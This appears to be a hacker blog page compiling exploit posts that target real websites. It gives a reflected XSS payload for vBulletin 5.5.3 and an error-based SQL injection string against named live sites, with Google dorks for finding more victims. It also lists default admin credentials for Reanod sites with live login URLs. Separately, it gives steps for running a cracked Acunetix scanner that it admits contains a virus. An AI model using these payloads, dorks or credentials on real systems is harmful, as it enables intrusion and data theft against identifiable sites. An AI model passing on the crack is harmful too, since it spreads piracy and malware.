vBulletin Reflected XSS via "Click here"

# Exploit Title: vBulletin Reflected XSS via "Click here"
# Google Dork: intext : "Powered by vBulletin® Version 5.5.3 Copyright © 2019 MH Sub I, LLC dba vBulletin"
# Date: 05/08/2019
# Exploit Author: TrazeR
# Vendor Homepage: https://www.vbulletin.com/
# Software Link: https://www.vbulletin.com/download.php
# Version: vBulletin 5.5.3
# Tested on: Windows 10
# CVE : CVE-2019-14538


#################################################################################

Dork: intext : "Powered by vBulletin® Version 5.5.3 Copyright © 2019 MH Sub I, LLC dba vBulletin"

vBulletin 5.5.3 Reflected XSS via "Click here"

Payload:

/admincp/index.php?loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]=javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin

(Click here!) click here xss will work

Demo :

https://forum.vbulletin.com/admincp/index.php?loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]=javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin

https://www.scootersoftware.com/vbulletin//admincp/index.php?loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]=javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin

https://www.photorials.nl/admincp/index.php?loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]=javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin

https://powerhacker.net/admincp/index.php?loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]=javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin

screenshot:

#################################################################################

> [Reference]
> https://hackerone.com/trazer
> https://www.trazer.org/
> https://www.cyber-warrior.org/194929/
> https://cxsecurity.com/author/TrazeR/1/

Designed by ORGINSTUDIOS.COM Sql İnjection Vulnerability

#################################################################################
# Exploit Title: Designed by ORGINSTUDIOS.COM Sql İnjection Vulnerability
# Author : TrazeR  & AKINCİLAR
# Google Dork : intext:"Designed by ORGINSTUDIOS.COM" inurl:catid
# Tested on : Windows 7
# Date : 01.07.2019
# Vendor Home: https://orginstudios.com/
# Blog : https://www.trazer.org/
# Forum : http://www.cyber-warrior.org/
#################################################################################

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

root@TrazeR:~# Tutorial :
[+] Dorking İn Google Or Other Search Enggine
[+] Sqlmap Or Manuel
[+] GET parameter 'catid' is vulnerable

Demo: http://graphicarts.gr/portal/corp.php?catid=260'+and(%2f**%2fsElEcT+1+%2f**%2ffRoM(%2f**%2fsElEcT+count(*),%2f**%2fcOnCaT((%2f**%2fsElEcT(%2f**%2fsElEcT+aes_decrypt(aes_encrypt(%2f**%2fcOnCaT(0x217e21,%2f**%2fdAtAbAsE(),0x217e21),1),1))+%2f**%2ffRoM+information_schema.%2f**%2ftAbLeS+%2f**%2flImIt+0,1),floor(rand(0)*2))x+%2f**%2ffRoM+information_schema.%2f**%2ftAbLeS+%2f**%2fgRoUp%2f**%2fbY+x)a)+and+'1'='1&cp=8&cntrid=


Demo 2 :  http://www.exaireton.com/mainsite/products.php?catid=37

Parameter: catid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: catid=-5607) OR 3893=3893-- HOfb

#AKINCILAR ! BU GÜCE SAYGI DUYUN !

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

Acunetix 12.019* Linux Cracked

Acunetix 12.019 Dowloand Buradan son sürüm indirin.
İstek üzerine detaylar kaldirilmiştir.

Command: chmod +777 patch_aws

Command:  

./acunetix-12.9.0.sh Yazarak İndirdiğiniz Dosyayi Çaliştirip Email Ve Şifre Belirleyin,

Not: Kurulum bitince size makine adres verecek (https://kali:3443/)

burdaki onemli olan link açmadan

tool çalıştırmadan patch yapmak

patch dosyasını bu adresde yetki yoksa yetkilendirip çalıştırıyoruz

bu adres kapalı ise gizli klosörleri açarak bulabilirsiniz

/home/acunetix/.acunetix_trial/v_19xxxxxx/scanner/

Crack : ./patch_aws

sorunsuz şekilde kullaabilirsiniz

Acunetix 12.x Full Cracked

Selamun Aleyküm ... Acunetix 12.x Sürümünü full yapmayi gösterdim, ek olarak 8. resimde bulduğu zafiyetleride gösteriyor. Resimlerde nasıl yapıldığı mevcut . Crack Viruslüdür localde kullanabilirsiniz

Dowloand Telegram: @??????? Selamımı iletip acunetix full cracki alabilirsiniz :) 

İSTEK ÜZERİNDE DETAYLAR KALDİRİLMİŞTİR.

Virus TOTAL

Burp Suite BurpBounty

Selamun Aleyküm ...

Burp Bounty (BApps Store'daki Adi Scan Check Builder), aktif ve pasif tarayicidir. Ben Manuel kurmayı tercih ettim. Sevdigim noktası payload listemizi ekleyebildiğimiz bir Burp Suite eklentisidir. Bu uzantı, Burp Suite Pro'yu gerektirir.

Dowloand: 
BurpBounty
BurpBounty-v2.3.jar

XSS PAYLOAD LİST

Video : 

Reanod Default Admin Password Vulnerability

#################################################################################
# Exploit Title: Reanod Default Admin Password Vulnerability
# Author : TrazeR & AKINCILAR
# Google Dork : intext:"Powered by reanod"
# Tested on : Kali Linux & Windows
# Date : 09.19.2018
# Vendor Home: http://www.reanod.com/
# Blog : http://www.trazer.org/
# Forum : http://cyber-warrior.org/
#################################################################################

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

root@TrazeR:~#
Tutorial :
[+] Dorking İn Google Or Other Search Enggine
[+] Manager-Url: /admin
[+] UserName: Reanod68 OR ===> admin
[+] Password: reanod6688

Demo:
http://www.ricemachinechina.com/admin.php

http://www.epic-crystal.com/wp-login.php

http://www.ynfmachineryparts.com/admin/

Greet'Z : AKINCILAR & Cyber-WarrioR.org And All Members

BU GÜCE SAYGI DUYUN !
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]